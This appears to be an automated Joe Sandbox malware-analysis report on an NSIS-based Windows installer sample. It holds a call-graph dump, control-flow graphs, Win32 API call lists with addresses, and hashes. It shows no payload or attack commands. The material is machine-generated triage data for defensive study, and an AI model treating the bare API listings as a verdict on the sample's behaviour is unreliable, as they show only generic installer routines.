4877 404a96 SendMessageW 4875->4877 4878 404aad 4876->4878 4877->4876 4881 404ae4 4878->4881 4884 406831 18 API calls 4878->4884 4879 404cfb 4882 404da0 4879->4882 4883 404c09 4879->4883 4888 404d4a SendMessageW 4879->4888 4880->4879 4892 40487a 5 API calls 4880->4892 4905 404c86 4880->4905 4887 403d6b 19 API calls 4881->4887 4885 404db5 4882->4885 4886 404da9 SendMessageW 4882->4886 4889 403df6 8 API calls 4883->4889 4890 404ac6 SendMessageW SendMessageW 4884->4890 4897 404dc7 ImageList_Destroy 4885->4897 4898 404dce 4885->4898 4903 404dde 4885->4903 4886->4885 4893 404af8 4887->4893 4888->4883 4895 404d5f SendMessageW 4888->4895 4896 404f97 4889->4896 4890->4878 4891 404ced SendMessageW 4891->4879 4892->4905 4899 403d6b 19 API calls 4893->4899 4894 404f48 4894->4883 4904 404f5d ShowWindow GetDlgItem ShowWindow 4894->4904 4900 404d72 4895->4900 4897->4898 4901 404dd7 GlobalFree 4898->4901 4898->4903 4907 404b09 4899->4907 4909 404d83 SendMessageW 4900->4909 4901->4903 4902 404bd6 GetWindowLongW SetWindowLongW 4906 404bf0 4902->4906 4903->4894 4908 40141d 80 API calls 4903->4908 4918 404e10 4903->4918 4904->4883 4905->4879 4905->4891 4910 404bf6 ShowWindow 4906->4910 4911 404c0e 4906->4911 4907->4902 4913 404b65 SendMessageW 4907->4913 4914 404bd0 4907->4914 4916 404b93 SendMessageW 4907->4916 4917 404ba7 SendMessageW 4907->4917 4908->4918 4909->4882 4925 403dc4 SendMessageW 4910->4925 4926 403dc4 SendMessageW 4911->4926 4913->4907 4914->4902 4914->4906 4916->4907 4917->4907 4919 404e54 4918->4919 4922 404e3e SendMessageW 4918->4922 4920 404f1f InvalidateRect 4919->4920 4924 404ecd SendMessageW SendMessageW 4919->4924 4920->4894 4921 404f35 4920->4921 4923 4043d9 21 API calls 4921->4923 4922->4919 4923->4894 4924->4919 4925->4883 4926->4880 4927 4030a9 SendMessageW 4928 4030c2 InvalidateRect 4927->4928 4929 4030e3 4927->4929 4928->4929 3880 4038af #17 SetErrorMode OleInitialize 3881 406328 3 API calls 3880->3881 3882 4038f2 SHGetFileInfoW 3881->3882 3954 406035 lstrcpynW 3882->3954 3884 40391d GetCommandLineW 3955 406035 lstrcpynW 3884->3955 3886 40392f GetModuleHandleW 3887 403947 3886->3887 3888 405d32 CharNextW 3887->3888 3889 403956 CharNextW 3888->3889 3900 403968 3889->3900 3890 403a02 3891 403a21 GetTempPathW 3890->3891 3956 4037f8 3891->3956 3893 403a37 3895 403a3b GetWindowsDirectoryW lstrcatW 3893->3895 3896 403a5f DeleteFileW 3893->3896 3894 405d32 CharNextW 3894->3900 3898 4037f8 11 API calls 3895->3898 3964 4035b3 GetTickCount GetModuleFileNameW 3896->3964 3901 403a57 3898->3901 3899 403a73 3902 403af8 3899->3902 3904 405d32 CharNextW 3899->3904 3940 403add 3899->3940 3900->3890 3900->3894 3907 403a04 3900->3907 3901->3896 3901->3902 4049 403885 3902->4049 3908 403a8a 3904->3908 4056 406035 lstrcpynW 3907->4056 3919 403b23 lstrcatW lstrcmpiW 3908->3919 3920 403ab5 3908->3920 3909 403aed 3912 406113 9 API calls 3909->3912 3910 403bfa 3913 403c7d 3910->3913 3915 406328 3 API calls 3910->3915 3911 403b0d 3914 405ccc MessageBoxIndirectW 3911->3914 3912->3902 3916 403b1b ExitProcess 3914->3916 3918 403c09 3915->3918 3922 406328 3 API calls 3918->3922 3919->3902 3921 403b3f CreateDirectoryW SetCurrentDirectoryW 3919->3921 4057 4067aa 3920->4057 3924 403b62 3921->3924 3925 403b57 3921->3925 3926 403c12 3922->3926 4074 406035 lstrcpynW 3924->4074 4073 406035 lstrcpynW 3925->4073 3930 406328 3 API calls 3926->3930 3933 403c1b 3930->3933 3932 403b70 4075 406035 lstrcpynW 3932->4075 3934 403c69 ExitWindowsEx 3933->3934 3939 403c29 GetCurrentProcess 3933->3939 3934->3913 3938 403c76 3934->3938 3935 403ad2 4072 406035 lstrcpynW 3935->4072 3941 40141d 80 API calls 3938->3941 3943 403c39 3939->3943 3992 405958 3940->3992 3941->3913 3942 406831 18 API calls 3944 403b98 DeleteFileW 3942->3944 3943->3934 3945 403ba5 CopyFileW 3944->3945 3951 403b7f 3944->3951 3945->3951 3946 403bee 3947 406c94 42 API calls 3946->3947 3949 403bf5 3947->3949 3948 406c94 42 API calls 3948->3951 3949->3902 3950 406831 18 API calls 3950->3951 3951->3942 3951->3946 3951->3948 3951->3950 3953 403bd9 CloseHandle 3951->3953 4076 405c6b CreateProcessW 3951->4076 3953->3951 3954->3884 3955->3886 3957 406064 5 API calls 3956->3957 3958 403804 3957->3958 3959 40380e 3958->3959 3960 40674e 3 API calls 3958->3960 3959->3893 3961 403816 CreateDirectoryW 3960->3961 3962 405eab 2 API calls 3961->3962 3963 40382a 3962->3963 3963->3893 4079 405e7c GetFileAttributesW CreateFileW 3964->4079 3966 4035f3 3986 403603 3966->3986 4080 406035 lstrcpynW 3966->4080 3968 403619 4081 40677d lstrlenW 3968->4081 3972 40362a GetFileSize 3973 403726 3972->3973 3987 403641 3972->3987 4086 4032d2 3973->4086 3975 40372f 3977 40376b GlobalAlloc 3975->3977 3975->3986 4098 403368 SetFilePointer 3975->4098 3976 403336 ReadFile 3976->3987 4097 403368 SetFilePointer 3977->4097 3980 4037e9 3983 4032d2 6 API calls 3980->3983 3981 403786 3984 40337f 33 API calls 3981->3984 3982 40374c 3985 403336 ReadFile 3982->3985 3983->3986 3990 403792 3984->3990 3989 403757 3985->3989 3986->3899 3987->3973 3987->3976 3987->3980 3987->3986 3988 4032d2 6 API calls 3987->3988 3988->3987 3989->3977 3989->3986 3990->3986 3990->3990 3991 4037c0 SetFilePointer 3990->3991 3991->3986 3993 406328 3 API calls 3992->3993 3994 40596c 3993->3994 3995 405972 3994->3995 3996 405984 3994->3996 4112 405f7d wsprintfW 3995->4112 3997 405eff 3 API calls 3996->3997 3998 4059b5 3997->3998 4000 4059d4 lstrcatW 3998->4000 4002 405eff 3 API calls 3998->4002 4001 405982 4000->4001 4103 403ec1 4001->4103 4002->4000 4005 4067aa 18 API calls 4006 405a06 4005->4006 4007 405a9c 4006->4007 4009 405eff 3 API calls 4006->4009 4008 4067aa 18 API calls 4007->4008 4010 405aa2 4008->4010 4011 405a38 4009->4011 4012 405ab2 4010->4012 4013 406831 18 API calls 4010->4013 4011->4007 4015 405a5b lstrlenW 4011->4015 4018 405d32 CharNextW 4011->4018 4014 405ad2 LoadImageW 4012->4014 4114 403ea0 4012->4114 4013->4012 4016 405b92 4014->4016 4017 405afd RegisterClassW 4014->4017 4019 405a69 lstrcmpiW 4015->4019 4020 405a8f 4015->4020 4024 40141d 80 API calls 4016->4024 4022 405b9c 4017->4022 4023 405b45 SystemParametersInfoW CreateWindowExW 4017->4023 4025 405a56 4018->4025 4019->4020 4026 405a79 GetFileAttributesW 4019->4026 4028 40674e 3 API calls 4020->4028 4022->3909 4023->4016 4029 405b98 4024->4029 4025->4015 4030 405a85 4026->4030 4027 405ac8 4027->4014 4031 405a95 4028->4031 4029->4022 4032 403ec1 19 API calls 4029->4032 4030->4020 4033 40677d 2 API calls 4030->4033 4113 406035 lstrcpynW 4031->4113 4035 405ba9 4032->4035 4033->4020 4036 405bb5 ShowWindow LoadLibraryW 4035->4036 4037 405c38 4035->4037 4038 405bd4 LoadLibraryW 4036->4038 4039 405bdb GetClassInfoW 4036->4039 4040 405073 83 API calls 4037->4040 4038->4039 4041 405c05 DialogBoxParamW 4039->4041 4042 405bef GetClassInfoW RegisterClassW 4039->4042 4043 405c3e 4040->4043 4046 40141d 80 API calls 4041->4046 4042->4041 4044 405c42 4043->4044 4045 405c5a 4043->4045 4044->4022 4048 40141d 80 API calls 4044->4048 4047 40141d 80 API calls 4045->4047 4046->4022 4047->4022 4048->4022 4050 40389d 4049->4050 4051 40388f CloseHandle 4049->4051 4121 403caf 4050->4121 4051->4050 4056->3891 4174 406035 lstrcpynW 4057->4174 4059 4067bb 4060 405d85 4 API calls 4059->4060 4061 4067c1 4060->4061 4062 406064 5 API calls 4061->4062 4069 403ac3 4061->4069 4065 4067d1 4062->4065 4063 406809 lstrlenW 4064 406810 4063->4064 4063->4065 4067 40674e 3 API calls 4064->4067 4065->4063 4066 406301 2 API calls 4065->4066 4065->4069 4070 40677d 2 API calls 4065->4070 4066->4065 4068 406816 GetFileAttributesW 4067->4068 4068->4069 4069->3902 4071 406035 lstrcpynW 4069->4071 4070->4063 4071->3935 4072->3940 4073->3924 4074->3932 4075->3951 4077 405ca6 4076->4077 4078 405c9a CloseHandle 4076->4078 4077->3951 4078->4077 4079->3966 4080->3968 4082 40678c 4081->4082 4083 406792 CharPrevW 4082->4083 4084 40361f 4082->4084 4083->4082 4083->4084 4085 406035 lstrcpynW 4084->4085 4085->3972 4087 4032f3 4086->4087 4088 4032db 4086->4088 4091 403303 GetTickCount 4087->4091 4092 4032fb 4087->4092 4089 4032e4 DestroyWindow 4088->4089 4090 4032eb 4088->4090 4089->4090 4090->3975 4094 403311 CreateDialogParamW ShowWindow 4091->4094 4095 403334 4091->4095 4099 40635e 4092->4099 4094->4095 4095->3975 4097->3981 4098->3982 4100 40637b PeekMessageW 4099->4100 4101 406371 DispatchMessageW 4100->4101 4102 403301 4100->4102 4101->4100 4102->3975 4104 403ed5 4103->4104 4119 405f7d wsprintfW 4104->4119 4106 403f49 4107 406831 18 API calls 4106->4107 4108 403f55 SetWindowTextW 4107->4108 4109 403f70 4108->4109 4110 403f8b 4109->4110 4111 406831 18 API calls 4109->4111 4110->4005 4111->4109 4112->4001 4113->4007 4120 406035 lstrcpynW 4114->4120 4116 403eb4 4117 40674e 3 API calls 4116->4117 4118 403eba lstrcatW 4117->4118 4118->4027 4119->4106 4120->4116 4122 403cbd 4121->4122 4123 4038a2 4122->4123 4124 403cc2 FreeLibrary GlobalFree 4122->4124 4125 406cc7 4123->4125 4124->4123 4124->4124 4126 4067aa 18 API calls 4125->4126 4127 406cda 4126->4127 4128 406ce3 DeleteFileW 4127->4128 4129 406cfa 4127->4129 4168 4038ae CoUninitialize 4128->4168 4130 406e77 4129->4130 4172 406035 lstrcpynW 4129->4172 4136 406301 2 API calls 4130->4136 4156 406e84 4130->4156 4130->4168 4132 406d25 4133 406d39 4132->4133 4134 406d2f lstrcatW 4132->4134 4137 40677d 2 API calls 4133->4137 4135 406d3f 4134->4135 4139 406d4f lstrcatW 4135->4139 4141 406d57 lstrlenW FindFirstFileW 4135->4141 4138 406e90 4136->4138 4137->4135 4142 40674e 3 API calls 4138->4142 4138->4168 4139->4141 4140 4062cf 11 API calls 4140->4168 4145 406e67 4141->4145 4169 406d7e 4141->4169 4143 406e9a 4142->4143 4146 4062cf 11 API calls 4143->4146 4144 405d32 CharNextW 4144->4169 4145->4130 4147 406ea5 4146->4147 4148 405e5c 2 API calls 4147->4148 4149 406ead RemoveDirectoryW 4148->4149 4153 406ef0 4149->4153 4154 406eb9 4149->4154 4150 406e44 FindNextFileW 4152 406e5c FindClose 4150->4152 4150->4169 4152->4145 4155 404f9e 25 API calls 4153->4155 4154->4156 4157 406ebf 4154->4157 4155->4168 4156->4140 4159 4062cf 11 API calls 4157->4159 4158 4062cf 11 API calls 4158->4169 4160 406ec9 4159->4160 4163 404f9e 25 API calls 4160->4163 4161 406cc7 72 API calls 4161->4169 4162 405e5c 2 API calls 4164 406dfa DeleteFileW 4162->4164 4165 406ed3 4163->4165 4164->4169 4166 406c94 42 API calls 4165->4166 4166->4168 4167 404f9e 25 API calls 4167->4150 4168->3910 4168->3911 4169->4144 4169->4150 4169->4158 4169->4161 4169->4162 4169->4167 4170 404f9e 25 API calls 4169->4170 4171 406c94 42 API calls 4169->4171 4173 406035 lstrcpynW 4169->4173 4170->4169 4171->4169 4172->4132 4173->4169 4174->4059 4930 401cb2 4931 40145c 18 API calls 4930->4931 4932 401c54 4931->4932 4933 4062cf 11 API calls 4932->4933 4934 401c64 4932->4934 4935 401c59 4933->4935 4936 406cc7 81 API calls 4935->4936 4936->4934 3706 4021b5 3707 40145c 18 API calls 3706->3707 3708 4021bb 3707->3708 3709 40145c 18 API calls 3708->3709 3710 4021c4 3709->3710 3711 40145c 18 API calls 3710->3711 3712 4021cd 3711->3712 3713 40145c 18 API calls 3712->3713 3714 4021d6 3713->3714 3715 404f9e 25 API calls 3714->3715 3716 4021e2 ShellExecuteW 3715->3716 3717 40221b 3716->3717 3718 40220d 3716->3718 3719 4062cf 11 API calls 3717->3719 3720 4062cf 11 API calls 3718->3720 3721 402230 3719->3721 3720->3717 4937 402238 4938 40145c 18 API calls 4937->4938 4939 40223e 4938->4939 4940 4062cf 11 API calls 4939->4940 4941 40224b 4940->4941 4942 404f9e 25 API calls 4941->4942 4943 402255 4942->4943 4944 405c6b 2 API calls 4943->4944 4945 40225b 4944->4945 4946 4062cf 11 API calls 4945->4946 4954 4022ac CloseHandle 4945->4954 4951 40226d 4946->4951 4948 4030e3 4949 402283 WaitForSingleObject 4950 402291 GetExitCodeProcess 4949->4950 4949->4951 4953 4022a3 4950->4953 4950->4954 4951->4949 4952 40635e 2 API calls 4951->4952 4951->4954 4952->4949 4956 405f7d wsprintfW 4953->4956 4954->4948 4956->4954 4957 404039 4958 404096 4957->4958 4959 404046 lstrcpynA lstrlenA 4957->4959 4959->4958 4960 404077 4959->4960 4960->4958 4961 404083 GlobalFree 4960->4961 4961->4958 4962 401eb9 4963 401f24 4962->4963 4966 401ec6 4962->4966 4964 401f53 GlobalAlloc 4963->4964 4968 401f28 4963->4968 4970 406831 18 API calls 4964->4970 4965 401ed5 4969 4062cf 11 API calls 4965->4969 4966->4965 4972 401ef7 4966->4972 4967 401f36 4986 406035 lstrcpynW 4967->4986 4968->4967 4971 4062cf 11 API calls 4968->4971 4981 401ee2 4969->4981 4974 401f46 4970->4974 4971->4967 4984 406035 lstrcpynW 4972->4984 4976 402708 4974->4976 4977 402387 GlobalFree 4974->4977 4977->4976 4978 401f06 4985 406035 lstrcpynW 4978->4985 4979 406831 18 API calls 4979->4981 4981->4976 4981->4979 4982 401f15 4987 406035 lstrcpynW 4982->4987 4984->4978 4985->4982 4986->4974 4987->4976

                                                                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                                                                            Function 004050F9 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 295windowclipboardmemoryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 0 4050f9-405114 1 4052c1-4052c8 0->1 2 40511a-405201 GetDlgItem * 3 call 403dc4 call 4044a2 call 406831 call 4062cf GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052f2-4052ff 1->3 4 4052ca-4052ec GetDlgItem CreateThread CloseHandle 1->4 35 405203-40521d SendMessageW * 2 2->35 36 40521f-405222 2->36 6 405320-405327 3->6 7 405301-40530a 3->7 4->3 11 405329-40532f 6->11 12 40537e-405382 6->12 9 405342-40534b call 403df6 7->9 10 40530c-40531b ShowWindow * 2 call 403dc4 7->10 22 405350-405354 9->22 10->6 16 405331-40533d call 403d44 11->16 17 405357-405367 ShowWindow 11->17 12->9 14 405384-405387 12->14 14->9 20 405389-40539c SendMessageW 14->20 16->9 23 405377-405379 call 403d44 17->23 24 405369-405372 call 404f9e 17->24 29 4053a2-4053c3 CreatePopupMenu call 406831 AppendMenuW 20->29 30 4052ba-4052bc 20->30 23->12 24->23 37 4053c5-4053d6 GetWindowRect 29->37 38 4053d8-4053de 29->38 30->22 35->36 39 405232-405249 call 403d6b 36->39 40 405224-405230 SendMessageW 36->40 41 4053df-4053f7 TrackPopupMenu 37->41 38->41 46 40524b-40525f ShowWindow 39->46 47 40527f-4052a0 GetDlgItem SendMessageW 39->47 40->39 41->30 43 4053fd-405414 41->43 45 405419-405434 SendMessageW 43->45 45->45 48 405436-405459 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 49 405261-40526c ShowWindow 46->49 50 40526e 46->50 47->30 51 4052a2-4052b8 SendMessageW * 2 47->51 52 40545b-405484 SendMessageW 48->52 54 405274-40527a call 403dc4 49->54 50->54 51->30 52->52 53 405486-4054a0 GlobalUnlock SetClipboardData CloseClipboard 52->53 53->30 54->47
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 004051C2
                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000008), ref: 00405266
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                                                                                                                                                                                                                                                                              • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042B018,771B23A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                                                                                                                                                                                                                                                                            • CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNELBASE(00000000), ref: 004052EC
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000), ref: 00405313
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000008), ref: 00405318
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000008), ref: 0040535F
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                                                                                                                                                                                                                                                                            • CreatePopupMenu.USER32 ref: 004053A2
                                                                                                                                                                                                                                                                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 004053CA
                                                                                                                                                                                                                                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                                                                                                                                                                                                                                                                            • OpenClipboard.USER32(00000000), ref: 00405437
                                                                                                                                                                                                                                                                                            • EmptyClipboard.USER32 ref: 0040543D
                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                                                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00405453
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                                                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                                                                                                                                                                                                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                                                                                                                                                                                                                                                                            • CloseClipboard.USER32 ref: 0040549A
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                                                                                                                                                                                                            • String ID: New install of "%s" to "%s"${
                                                                                                                                                                                                                                                                                            • API String ID: 2110491804-1641061399
                                                                                                                                                                                                                                                                                            • Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                                                                                                                                                                            • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58
                                                                                                                                                                                                                                                                                            Function 004038AF Relevance: 52.8, APIs: 22, Strings: 8, Instructions: 304filestringcomCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 202 4038af-403945 #17 SetErrorMode OleInitialize call 406328 SHGetFileInfoW call 406035 GetCommandLineW call 406035 GetModuleHandleW 209 403947-40394a 202->209 210 40394f-403963 call 405d32 CharNextW 202->210 209->210 213 4039f6-4039fc 210->213 214 403a02 213->214 215 403968-40396e 213->215 216 403a21-403a39 GetTempPathW call 4037f8 214->216 217 403970-403976 215->217 218 403978-40397c 215->218 228 403a3b-403a59 GetWindowsDirectoryW lstrcatW call 4037f8 216->228 229 403a5f-403a79 DeleteFileW call 4035b3 216->229 217->217 217->218 219 403984-403988 218->219 220 40397e-403983 218->220 222 4039e4-4039f1 call 405d32 219->222 223 40398a-403991 219->223 220->219 222->213 237 4039f3 222->237 226 403993-40399a 223->226 227 4039a6-4039b8 call 40382c 223->227 232 4039a1 226->232 233 40399c-40399f 226->233 242 4039ba-4039c1 227->242 243 4039cd-4039e2 call 40382c 227->243 228->229 240 403af8-403b07 call 403885 CoUninitialize 228->240 229->240 241 403a7b-403a81 229->241 232->227 233->227 233->232 237->213 257 403bfa-403c00 240->257 258 403b0d-403b1d call 405ccc ExitProcess 240->258 244 403ae1-403ae8 call 405958 241->244 245 403a83-403a8c call 405d32 241->245 247 4039c3-4039c6 242->247 248 4039c8 242->248 243->222 254 403a04-403a1c call 40824c call 406035 243->254 256 403aed-403af3 call 406113 244->256 260 403aa5-403aa7 245->260 247->243 247->248 248->243 254->216 256->240 262 403c02-403c1f call 406328 * 3 257->262 263 403c7d-403c85 257->263 267 403aa9-403ab3 260->267 268 403a8e-403aa0 call 40382c 260->268 293 403c21-403c23 262->293 294 403c69-403c74 ExitWindowsEx 262->294 269 403c87 263->269 270 403c8b 263->270 275 403b23-403b3d lstrcatW lstrcmpiW 267->275 276 403ab5-403ac5 call 4067aa 267->276 268->267 283 403aa2 268->283 269->270 275->240 277 403b3f-403b55 CreateDirectoryW SetCurrentDirectoryW 275->277 276->240 286 403ac7-403add call 406035 * 2 276->286 281 403b62-403b82 call 406035 * 2 277->281 282 403b57-403b5d call 406035 277->282 303 403b87-403ba3 call 406831 DeleteFileW 281->303 282->281 283->260 286->244 293->294 297 403c25-403c27 293->297 294->263 300 403c76-403c78 call 40141d 294->300 297->294 301 403c29-403c3b GetCurrentProcess 297->301 300->263 301->294 308 403c3d-403c5f 301->308 309 403be4-403bec 303->309 310 403ba5-403bb5 CopyFileW 303->310 308->294 309->303 311 403bee-403bf5 call 406c94 309->311 310->309 312 403bb7-403bd7 call 406c94 call 406831 call 405c6b 310->312 311->240 312->309 322 403bd9-403be0 CloseHandle 312->322 322->309
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • #17.COMCTL32 ref: 004038CE
                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                                                                                                                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                            • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                            • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                                                                                                                                                                                                                                            • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                                                                                                                                                                                                                                            • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                                                                                                                                                                                                                                            • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                                                                                                                                                                                                                                            • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00403B1D
                                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                                                                                                                                                                                                                                            • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                                                                                                                                                                                                                                            • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                                                                                                                                                                                                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
